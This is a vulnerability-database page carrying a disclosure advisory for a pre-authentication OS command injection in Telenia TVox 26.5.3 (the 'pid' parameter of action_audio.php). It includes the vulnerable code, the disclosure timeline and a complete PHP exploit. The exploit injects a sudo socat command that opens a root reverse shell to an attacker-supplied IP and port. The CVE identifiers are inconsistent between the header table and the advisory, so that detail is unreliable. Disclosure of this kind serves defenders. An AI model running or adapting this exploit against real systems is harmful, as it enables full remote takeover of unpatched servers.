📄 Telenia Software TVox 26.5.3 Command Injection
| Reporter | Title | Published | Views | Family All 16 |
|---|---|---|---|---|
| CVE-2026-67608 | 3 Aug 202613:30 | – | attackerkb | |
| CVE-2026-64828 | 22 Jul 202615:39 | – | attackerkb | |
| CVE-2026-64828 | 22 Jul 202618:37 | – | circl | |
| CVE-2026-67608 | 3 Aug 202614:22 | – | circl | |
| CVE-2026-64828 | 22 Jul 202615:39 | – | cve | |
| CVE-2026-67608 | 3 Aug 202613:30 | – | cve | |
| CVE-2026-64828 Froiden TableTrack 1.3.10 Stored XSS via Order Notes Field | 22 Jul 202615:39 | – | cvelist | |
| CVE-2026-67608 Telenia TVox 26.5.3 OS Command Injection via action_audio.php | 3 Aug 202613:30 | – | cvelist | |
| EUVD-2026-47733 | 22 Jul 202615:39 | – | euvd | |
| EUVD-2026-52293 | 3 Aug 202613:30 | – | euvd |
10
-------------------------------------------------------------------------------------
Telenia Software TVox <= 26.5.3 (action_audio.php) OS Command Injection
Vulnerability
-------------------------------------------------------------------------------------
[-] Software Link:
https://www.teleniasoftware.com
[-] Affected Versions:
Version 26.5.3 and prior 26.x versions.
Version 24.9.21 and prior 24.x versions.
Older versions may be affected as well.
[-] Vulnerability Description:
The vulnerable code is located within the
/opt/telenia/tvox/php/siti/t-vox/manager/html/action_audio.php script:
180. case "checkProcess":
181. $pid = @trim($_REQUEST["pid"]);
182. $logFile = @trim($_REQUEST["logFile"]);
183. if ($pid != "")
184. exec('ps -p ' . $_REQUEST["pid"], $output);
User input passed through the "pid" request parameter (when the "action"
request parameter is set to "checkProcess") is not properly sanitized
before being used to execute OS commands via an exec() call at line 184.
This can be exploited to inject and execute arbitrary OS commands with the
privileges of the "apache" user on the web server.
[-] Proof of Concept:
https://karmainsecurity.com/pocs/tvox_root_rce.php
[-] Solution:
No official solution is currently available.
[-] Disclosure Timeline:
[22/05/2026] - Vendor was contacted, no response
[26/05/2026] - Vendor was notified about this vulnerability, no response
[27/05/2026] - Vendor was notified about 60-day disclosure deadline policy,
no response
[26/06/2026] - Vendor was contacted again along with CSIRT Italy, no
response from CSIRT
[08/07/2026] - First vendor response, asking for vulnerability details
[09/07/2026] - Vulnerability details safely provided to the vendor
[20/07/2026] - Vendor was contacted again, asking for an update
[21/07/2026] - Vendor replied a security patch will be released by the end
of July
[21/07/2026] - CVE identifier requested
[21/07/2026] - CVE identifier assigned
[27/07/2026] - Reached 60-day disclosure deadline, still no official
solution
[03/08/2026] - Public disclosure
[-] CVE Reference:
CVE-2026-64828 has been assigned to this vulnerability.
[-] Credits:
Vulnerability discovered by Egidio Romano.
[-] Original Advisory:
https://karmainsecurity.com/KIS-2026-15
-- packet storm added poc --
<?php
/*
---------------------------------------------------------
Telenia Software TVox <= 26.5.3 Pre-Auth Root RCE Exploit
---------------------------------------------------------
author..............: Egidio Romano aka EgiX
mail................: n0b0d13s[at]gmail[dot]com
software link.......: https://www.teleniasoftware.com
+-------------------------------------------------------------------------+
| This proof of concept code was written for educational purpose only. |
| Use it at your own risk. Author will be not responsible for any damage. |
+-------------------------------------------------------------------------+
[-] Original Advisories:
https://karmainsecurity.com/KIS-2026-14
https://karmainsecurity.com/KIS-2026-15
https://karmainsecurity.com/KIS-2026-16
*/
set_time_limit(0);
error_reporting(E_ERROR);
print "\n+----------------------------------------------------------+";
print "\n| Telenia Software TVox <= 26.5.3 Root RCE Exploit by EgiX |";
print "\n+----------------------------------------------------------+\n\n";
if (!extension_loaded("curl")) die("[-] cURL extension required!\n");
if ($argc != 4) die("Usage: php $argv[0] <URL> <ATTACKER_IP> <ATTACKER_PORT>\n\n");
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "{$argv[1]}tvox/manager/html/action_audio.php/login_admin.php");
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
// On attacker machine: socat file:`tty`,raw,echo=0 tcp-listen:4444
print "[+] Executing reverse shell\n";
$injection = "\$(sudo nice socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:{$argv[2]}:{$argv[3]})";
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query(["action" => "checkProcess", "pid" => $injection]));
curl_exec($ch);
print "[+] Done!\n\n";Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
03 Aug 2026 00:00Current
5.5Medium risk
Vulners AI Score5.5
CVSS 48.6
CVSS 3.17.2
EPSS0.00204
SSVC